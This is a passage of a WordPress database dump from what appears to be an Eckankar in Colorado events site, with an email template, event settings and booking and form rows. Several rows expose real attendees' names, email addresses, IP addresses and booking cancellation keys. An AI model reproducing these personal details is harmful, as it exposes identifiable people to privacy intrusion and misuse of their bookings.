.columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(159059,266522,'mec_event_status','EventScheduled'),(159060,266522,'mec_moved_online_link',''),(159061,266522,'mec_cancelled_reason',''),(159062,266522,'mec_display_cancellation_reason_in_single_page',''),(159063,266522,'protect_children',''),(159064,266522,'passster_activate_global_protection',NULL),(159065,266522,'passster_activate_protection',NULL),(159066,266522,'passster_protection_type','password'),(159067,266522,'boldgrid_hide_page_title','0'),(159068,266522,'_thumbnail_id','266472'),(159069,266522,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(159070,266522,'boldgrid_in_page_containers','1'),(159072,266522,'_dp_original','266474'),(159073,266522,'_edit_lock','1679957000:2'),(159074,266522,'_edit_last','2'),(161217,266644,'mec_gateway_label','Free'),(161216,266644,'mec_gateway','MEC_gateway_free'),(161215,266644,'mec_price','0'),(161199,266644,'mec_verification_key','b51892ffaf68d18e3a2a0cb90b330dd1'),(161247,266654,'mec_gateway_label','Free'),(161246,266654,'mec_gateway','MEC_gateway_free'),(161244,266654,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:25:\"jackiediane1109@gmail.com\";s:4:\"name\";s:25:\"Jacqueline Diane Roberts \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"99.126.115.16\";}}'),(161243,266654,'mec_ticket_price_1','0'),(161242,266654,'mec_booking_location','129'),(161238,266654,'mec_attention_time','1652005800:1652052600'),(161237,266654,'mec_other_dates','a:0:{}'),(161235,266654,'mec_booking_time','2022-05-06 06:20:57'),(161234,266654,'mec_ticket_id',',1,'),(161233,266654,'mec_date','1652005800:1652052600'),(161231,266654,'mec_confirmed','1'),(161230,266654,'mec_cancellation_key','245f63f7325befca7b9604a3ef9124aa'),(161229,266654,'mec_verification_key','6bbcee0aca35830af3dd0c2b593ee9ce'),(161620,266674,'mec_booking_time','2022-05-08 13:28:03'),(161619,266674,'mec_ticket_id',',1,'),(161618,266674,'mec_date','1652814000:1652817600'),(161617,266674,'mec_event_id','266611'),(161616,266674,'mec_confirmed','1'),(161615,266674,'mec_cancellation_key','c2cf785c9d7c41be0e0f8a75c121dbea'),(161614,266674,'mec_verification_key','fefa127cbbe69fad072d77b667463b27'),(161608,266673,'mec_price','0'),(161609,266673,'mec_gateway','MEC_gateway_free'),(161610,266673,'mec_gateway_label','Free'),(161611,266674,'mec_transaction_id','PNE35451'),(161612,266674,'mec_user_id','1000015'),(161613,266674,'mec_verified','1'),(161606,266673,'mec_ticket_price_1','0'),(161607,266673,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"68.114.224.80\";}}'),(161605,266673,'mec_booking_location','118'),(161604,266673,'mec_book_date_submit','20220508132011'),(161603,266673,'mec_attention_time_end','1652619600'),(161602,266673,'mec_attention_time_start','1652615100'),(161601,266673,'mec_attention_time','1652615100:1652619600'),(161600,266673,'mec_other_dates','a:0:{}'),(161599,266673,'mec_all_dates','a:0:{}'),(161598,266673,'mec_booking_time','2022-05-08 13:20:11'),(161597,266673,'mec_ticket_id',',1,'),(161596,266673,'mec_date','1652615100:1652619600'),(161595,266673,'mec_event_id','266604'),(161594,266673,'mec_confirmed','1'),(161593,266673,'mec_cancellation_key','d8092cc12ec9fd3702677f7f6cbbc8c3'),(161592,266673,'mec_verification_key','170424f3aa190160d40d84e5dfd5c422'),(161591,266673,'mec_verified','1'),(161590,266673,'mec_user_id','1000015'),(161589,266673,'mec_transaction_id','GDA52192'),(161588,266672,'_seq_num','9'),(161587,266672,'_form_id','17'),(161574,266671,'_field_225','Haebig'),(161575,266671,'_field_226','sue2earth@msn.com'),(161576,266671,'_field_227','WI'),(161577,266671,'_field_228','US'),(161578,266671,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(161579,266671,'_form_id','21'),(161580,266671,'_seq_num','149'),(161581,266672,'_field_179','Susan'),(161582,266672,'_field_180','Haebig'),(161583,266672,'_field_181','sue2earth@msn.com'),(161584,266672,'_field_182','WI'),(161585,266672,'_field_183','US'),(161586,266672,'_field_184','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:41:\"Central Colorado - ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(161567,266670,'mec_booking_location','129'),(161568,266670,'mec_ticket_price_1','0'),(161569,266670,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"97.121.137.238\";}}'),(161570,266670,'mec_price','0'),(161571,266670,'mec_gateway','MEC_gateway_free'),(161572,266670,'mec_gateway_label','Free'),(161573,266671,'_field_224','Susan'),(161566,266670,'mec_book_date_submit','20220508105442'),(161565,266670,'mec_attention_time_end','1652052600'),(161564,266670,'mec_attention_time_start','1652005800'),(161563,266670,'mec_attention_time','1652005800:1652052600'),(161562,266670,'mec_other_dates','a:0:{}'),(161561,266670,'mec_all_dates','a:0:{}'),(161560,266670,'mec_booking_time','2022-05-08 10:54:41'),(161559,266670,'mec_ticket_id',',1,'),(161558,266670,'mec_date','1652005800:1652052600'),(161406,266662,'mec_attention_time_end','1652052600'),(161407,266662,'mec_book_date_submit','20220508094044'),(161408,266662,'mec_booking_location','129'),(161409,266662,'mec_ticket_price_1','0'),(161410,266662,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"lynnzies3@gmail.com\";s:4:\"name\";s:7:\"Lynnzie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"64.188.179.255\";}}'),(161411,266662,'mec_price','0'),(161412,266662,'mec_gateway','MEC_gateway_free'),(161413,266662,'mec_gateway_label','Free'),(161414,266663,'mec_transaction_id','HFX86700'),(161415,266663,'mec_user_id','1000010'),(161416,266663,'mec_verified','1'),(161417,266663,'mec_verification_key','17bad74ac3be74a74836ad76ea70d058'),(161418,266663,'mec_cancellation_key','b8fb6b3eeb8128e0e61f6aa77265e220'),(161419,266663,'mec_confirmed','1'),(161420,266663,'mec_event_id','266568'),(161421,266663,'mec_date','1652005800:1652052600'),(161422,266663,'mec_ticket_id',',1,'),(161423,266663,'mec_booking_time','2022-05-08 09:59:26'),(161424,266663,'mec_all_dates','a:0:{}'),(161425,266663,'mec_other_dates','a:0:{}'),(161426,266663,'mec_attention_time','1652005800:1652052600'),(161427,266663,'mec_attention_time_start','1652005800'),(161428,266663,'mec_attention_time_end','1652052600'),(161429,266663,'mec_book_date_submit','20220508095926'),(161430,266663,'mec_booking_location','129'),(161431,266663,'mec_ticket_price_1','0'),(161432,266663,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"uchenwamoh@yahoo.com\";s:4:\"name\";s:4:\"Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"102.89.33.228\";}}'),(161433,266663,'mec_price','0'),(161434,266663,'mec_gateway','MEC_gateway_free'),(161435,266663,'mec_gateway_label','Free'),(161436,266664,'mec_transaction_id','EWU87439'),(161437,266664,'mec_user_id','1000003'),(161438,266664,'mec_verified','1'),(161439,266664,'mec_verification_key','07f6a454f5106215d66c7f064c75f6f0'),(161440,266664,'mec_cancellation_key','7935d12351fa3ba00904d163619dbe94'),(161441,266664,'mec_confirmed','1'),(161442,266664,'mec_event_id','266568'),(161443,266664,'mec_date','1652005800:1652052600'),(161444,266664,'mec_ticket_id',',1,'),(161445,266664,'mec_booking_time','2022-05-08 10:33:03'),(161446,266664,'mec_all_dates','a:0:{}'),(161447,266664,'mec_other_dates','a:0:{}'),(161448,266664,'mec_attention_time','1652005800:1652052600'),(161449,266664,'mec_attention_time_start','1652005800'),(161450,266664,'mec_attention_time_end','1652052600'),(161451,266664,'mec_book_date_submit','20220508103303'),(161452,266664,'mec_booking_location','129'),(161453,266664,'mec_ticket_price_1','0'),(161454,266664,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:10:\"Sue Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"96.60.41.70\";}}'),(161455,266664,'mec_price','0'),(161456,266664,'mec_gateway','MEC_gateway_free'),(161457,266664,'mec_gateway_label','Free'),(161458,266665,'mec_transaction_id','VFB37200'),(161459,266665,'mec_user_id','1000011'),(161460,266665,'mec_verified','1'),(161461,266665,'mec_verification_key','95ca41f79e4750e1ec722f29dcc63bd7'),(161462,266665,'mec_cancellation_key','02ef1f5ff67e79314083bb9e0f984b09'),(161463,266665,'mec_confirmed','1'),(161464,266665,'mec_event_id','266568'),(161465,266665,'mec_date','1652005800:1652052600'),(161466,266665,'mec_ticket_id',',1,'),(161467,266665,'mec_booking_time','2022-05-08 10:33:24'),(161468,266665,'mec_all_dates','a:0:{}'),(161469,266665,'mec_other_dates','a:0:{}'),(161470,266665,'mec_attention_time','1652005800:1652052600'),(161471,266665,'mec_attention_time_start','1652005800'),(161472,266665,'mec_attention_time_end','1652052600'),(161473,266665,'mec_book_date_submit','20220508103324'),(161474,266665,'mec_booking_location','129'),(161475,266665,'mec_ticket_price_1','0'),(161476,266665,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sewgoodseed@gmail.com\";s:4:\"name\";s:8:\"Michele \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"71.196.199.175\";}}'),(161477,266665,'mec_price','0'),(161478,266665,'mec_gateway','MEC_gateway_free'),(161479,266665,'mec_gateway_label','Free'),(161480,266666,'mec_transaction_id','BDC98943'),(161481,266666,'mec_user_id','1000011'),(161482,266666,'mec_verified','1'),(161483,266666,'mec_verification_key','beb0c904e28c36f950533c83bdc4f5cc'),(161484,266666,'mec_cancellation_key','e1086f3a8deba849331518c344f6ea1b'),(161485,266666,'mec_confirmed','1'),(161486,266666,'mec_event_id','266568'),(161487,266666,'mec_date','1652005800:1652052600'),(161488,266666,'mec_ticket_id',',1,'),(161489,266666,'mec_booking_time','2022-05-08 10:37:51'),(161490,266666,'mec_all_dates','a:0:{}'),(161491,266666,'mec_other_dates','a:0:{}'),(161492,266666,'mec_attention_time','1652005800:1652052600'),(161493,266666,'mec_attention_time_start','1652005800'),(161494,266666,'mec_attention_time_end','1652052600'),(161495,266666,'mec_book_date_submit','20220508103751'),(161496,266666,'mec_booking_location','129'),(161497,266666,'mec_ticket_price_1','0'),(161498,266666,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sewgoodseed@gmail.com\";s:4:\"name\";s:8:\"Michele \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"71.196.199.175\";}}'),(161499,266666,'mec_price','0'),(161500,266666,'mec_gateway','MEC_gateway_free'),(161501,266666,'mec_gateway_label','Free'),(161502,266667,'mec_transaction_id','FBM20391'),(161503,266667,'mec_user_id','1000012'),(161504,266667,'mec_verified','1'),(161505,266667,'mec_verification_key','a6a94b3154915efd5ef075efdd2208c5'),(161506,266667,'mec_cancellation_key','c638cb17896615c7099d7b215f647324'),(161507,266667,'mec_confirmed','1'),(161508,266667,'mec_event_id','266568'),(161509,266667,'mec_date','1652005800:1652052600'),(161510,266667,'mec_ticket_id',',1,'),(161511,266667,'mec_booking_time','2022-05-08 10:41:41'),(161512,266667,'mec_all_dates','a:0:{}'),(161513,266667,'mec_other_dates','a:0:{}'),(161514,266667,'mec_attention_time','1652005800:1652052600'),(161515,266667,'mec_attention_time_start','1652005800'),(161516,266667,'mec_attention_time_end','1652052600'),(161517,266667,'mec_book_date_submit','20220508104141'),(161518,266667,'mec_booking_location','129'),(161519,266667,'mec_ticket_price_1','0'),(161520,266667,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"65.130.12.188\";}}'),(161521,266667,'mec_price','0'),(161522,266667,'mec_gateway','MEC_gateway_free'),(161523,266667,'mec_gateway_label','Free'),(161524,266668,'_field_425','Beth'),(161525,266668,'_field_426','Massengale'),(161526,266668,'_field_427','beth1848@yahoo.com'),(161527,266668,'_form_id','46'),(161528,266668,'_seq_num','53'),(161529,266669,'mec_transaction_id','JHY63353'),(161530,266669,'mec_user_id','1000013'),(161531,266669,'mec_verified','1'),(161532,266669,'mec_verification_key','526ab522a6edf74f22415b75ae7698ef'),(161533,266669,'mec_cancellation_key','6bc1c757055fcc7f56d543f7c0c87b4d'),(161534,266669,'mec_confirmed','1'),(161535,266669,'mec_event_id','266568'),(161536,266669,'mec_date','1652005800:1652052600'),(161537,266669,'mec_ticket_id',',1,'),(161538,266669,'mec_booking_time','2022-05-08 10:53:58'),(161539,266669,'mec_all_dates','a:0:{}'),(161540,266669,'mec_other_dates','a:0:{}'),(161541,266669,'mec_attention_time','1652005800:1652052600'),(161542,266669,'mec_attention_time_start','1652005800'),(161543,266669,'mec_attention_time_end','1652052600'),(161544,266669,'mec_book_date_submit','20220508105358'),(161545,266669,'mec_booking_location','129'),(161546,266669,'mec_ticket_price_1','0'),(161547,266669,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"acongem@gmail.com\";s:4:\"name\";s:21:\"Tony Olih Nwaokolobia\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"41.190.30.224\";}}'),(161548,266669,'mec_price','0'),(161549,266669,'mec_gateway','MEC_gateway_free'),(161550,266669,'mec_gateway_label','Free'),(161551,266670,'mec_transaction_id','YWK45796'),(161552,266670,'mec_user_id','1000014'),(161553,266670,'mec_verified','1'),(161554,266670,'mec_verification_key','4c60abd5155884277b5ce1c7497fa615'),(161555,266670,'mec_cancellation_key','1bc71a554a87292d7e42152a2e1fa56c'),(161556,266670,'mec_confirmed','1'),(161557,266670,'mec_event_id','266568'),(161405,266662,'mec_attention_time_start','1652005800'),(159236,266537,'_field_535','Here is my message'),(159237,266537,'_form_id','56'),(159238,266537,'_seq_num','1'),(159239,266538,'protect_children',''),(159240,266538,'_field_530','Test'),(159241,266538,'_field_531','Testubg'),(159242,266538,'_field_532','choll.03@comcast.net'),(161404,266662,'mec_attention_time','1652005800:1652052600'),(161403,266662,'mec_other_dates','a:0:{}'),(161402,266662,'mec_all_dates','a:0:{}'),(161401,266662,'mec_booking_time','2022-05-08 09:40:44'),(161400,266662,'mec_ticket_id',',1,'),(159243,266538,'_field_534','Test'),(159244,266538,'_field_535','Test test'),(159245,266538,'_form_id','56'),(159246,266538,'_seq_num','2'),(159247,266539,'protect_children',''),(159248,266539,'_field_530','test'),(159249,266539,'_field_531','test'),(159250,266539,'_field_532','choll.03@comcast.net'),(159251,266539,'_field_535','afsdfasdgafg\nagdsa'),(159252,266539,'_form_id','56'),(159253,266539,'_seq_num','3'),(159254,266540,'mec_color',''),(159255,266540,'mec_location_id','129'),(159256,266540,'mec_dont_show_map','0'),(159257,266540,'mec_organizer_id','1'),(159258,266540,'mec_read_more',''),(159259,266540,'mec_more_info',''),(159260,266540,'mec_more_info_title',''),(159261,266540,'mec_more_info_target','_self'),(159262,266540,'mec_cost',''),(159263,266540,'mec_currency','a:0:{}'),(159264,266540,'mec_additional_organizer_ids','a:0:{}'),(159265,266540,'mec_additional_location_ids','a:0:{}'),(159266,266540,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2027-05-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2027-05-09\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(159267,266540,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(159268,266540,'mec_certain_weekdays','a:0:{}'),(159269,266540,'mec_allday','0'),(159270,266540,'one_occurrence','0'),(159271,266540,'mec_hide_time','0'),(159272,266540,'mec_hide_end_time','0'),(159273,266540,'mec_comment',''),(159274,266540,'mec_timezone','global'),(159275,266540,'mec_countdown_method','global'),(159276,266540,'mec_public','1'),(159277,266540,'mec_start_date','2027-05-09'),(159278,266540,'mec_start_time_hour','10'),(159279,266540,'mec_start_time_minutes','30'),(159280,266540,'mec_start_time_ampm','AM'),(159281,266540,'mec_start_day_seconds','37800'),(159282,266540,'mec_end_date','2027-05-09'),(159283,266540,'mec_end_time_hour','11'),(159284,266540,'mec_end_time_minutes','30'),(159285,266540,'mec_end_time_ampm','PM'),(159286,266540,'mec_end_day_seconds','84600'),(159287,266540,'mec_repeat_status','0'),(159288,266540,'mec_repeat_type',''),(159289,266540,'mec_repeat_interval','1'),(159290,266540,'mec_repeat_end',''),(159291,266540,'mec_repeat_end_at_occurrences','9'),(159292,266540,'mec_repeat_end_at_date',''),(159293,266540,'mec_advanced_days','a:0:{}'),(159294,266540,'mec_in_days',''),(159295,266540,'mec_not_in_days',''),(159296,266540,'mec_hourly_schedules','a:0:{}'),(159297,266540,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(193841,269222,'_form_id','61'),(193831,269221,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(159298,266540,'mec_tickets','a:1:{i:1;a:21:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register 